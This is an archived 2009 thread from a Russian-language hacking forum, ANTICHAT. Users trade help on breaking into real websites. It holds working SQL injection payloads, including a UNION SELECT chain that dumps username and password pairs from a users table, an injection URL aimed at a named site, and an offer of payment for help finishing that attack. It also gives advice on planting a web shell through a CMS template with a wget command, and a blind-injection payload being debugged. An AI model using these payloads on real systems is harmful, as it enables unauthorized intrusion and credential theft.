ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.10.2009, 16:11
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от Patrik
_http://apg-ua.com/index.php?o=66+AND+substring(Password(),1,1)<100--
Пол царства за имя поля с паролем  Омайгадэбл, ты сам то понял что написал?
Сообщение от Nightmarе
Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???
Можно!
|
|
|
23.10.2009, 16:19
|
|
Познающий
Регистрация: 15.01.2006
Сообщений: 45
Провел на форуме:
210499
Репутация:
16
|
|
Сообщение от DrAssault
Омайгадэбл, ты сам то понял что написал?
Понял. Поля Password нету там. А как оно называется я подобрать не смог с кучи вариантов.
Если кто-то поможет довести до конца в ближайшее - я денег дам.
Последний раз редактировалось Patrik; 23.10.2009 в 16:24..
|
|
|
|
23.10.2009, 16:43
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от Patrik
Понял. Поля Password нету там. А как оно называется я подобрать не смог с кучи вариантов.
Если кто-то поможет довести до конца в ближайшее - я денег дам.
Как же всё запущено, одно могу сказать, читай, читай, читай... поля пасворд где? ньде ...
|
|
|
|
23.10.2009, 17:13
|
|
Познающий
Регистрация: 15.01.2006
Сообщений: 45
Провел на форуме:
210499
Репутация:
16
|
|
Сообщение от DrAssault
Как же всё запущено, одно могу сказать, читай, читай, читай... поля пасворд где? ньде ... не так уж и запущено, только имена таблицы и поля с паролем подобрать не выходит...
|
|
|
|
23.10.2009, 17:26
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
как в дле залить шелл через шаблон?
|
|
|
|
23.10.2009, 19:07
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от M1ks
как в дле залить шелл через шаблон?
Впиши туда .
Если фильтрации нету, то ?c=wget и т.п.
|
|
|
|
23.10.2009, 19:12
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
фильтрация..
ps есть еще доступ к админке в Coppermine Photo Gallery , на форуме смотрел баги, непрокатило, незнаю вот как туда еще можно шел вбить..
|
|
|
|
23.10.2009, 21:08
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
а просто from название_таблицы не судьба?
|
|
|
|
23.10.2009, 21:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
тогда
Код:
16+union+select+1,2,3,table_schema,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x6f73725f7573657273+limit+0,1
то, что выше, выучить как отче наш, а то, что выведет на экран, надо будет добавить к имени таблице, через точку, т.к. это будет БД, в которой лежит интересующая нас таблица
Результаты будут, если у текущего юзера будут соотвествующие права на доступ к интересующей БД, т.е. к примеру на запрос выше выдаст:
1321412354123_forum
тогда следующий запрос такой:
+union+select+1,2,3,concat(username,0x3b,password) ,5,6,7,8,9,10,11,12+from+1321412354123_forum.osr_u sers
если опять выдаст ошибку, вывода только два:
1. Записей в osr_users просто нет (==0)
2. нет прав доступа
Тут можно проверить только пункт 1:
+union+select+1,2,3,count(*) ,5,6,7,8,9,10,11,12+from+1321412354123_forum.osr_u sers
если выведется "0" - то дальше думаю объяснять не надо, значит таблица пустая
Последний раз редактировалось Pashkela; 23.10.2009 в 21:30..
|
|
|
|
23.10.2009, 21:50
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
подскажите в чем проблема:
есть php скрипт который выполняет поиск в БД MySQL, содержимое запроса к БД примерно такое:
PHP код:
// так как самого кода скрипта нет, предполагаю, что код выглядит примерно так
$col1 = $_POST['col1'];
$col2 = $_POST['col2'];
mysql_query("SELECT * FROM `table` WHERE col1='".$col1."' AND col2='".$col2."' еще что-то");
вывода переменных нет.
я пытаюсь выполнить запрос к БД, что бы тот вернул мне результат true:
Код:
-1' OR LOCATE(1,(SUBSTRING(SELECT id FROM users WHERE id=1),1,1))#
В итоге запрос принимает форуме примерно такую:
Код:
SELECT * FROM `table` WHERE col1='-1' OR LOCATE(1,(SUBSTRING(SELECT id FROM users WHERE id=1),1,1))#' AND col2='1' еще что-то
Если я не ошибаюсь, то результат выполнения LOCATE должен вернуть true, т.к. id=1
Но в результате я получаю:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select id from users where id=1),1,1))#%' AND col2
Почему так?
Последний раз редактировалось Aртем; 23.10.2009 в 21:52..
|
|
|
|
|
|
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Линейный вид
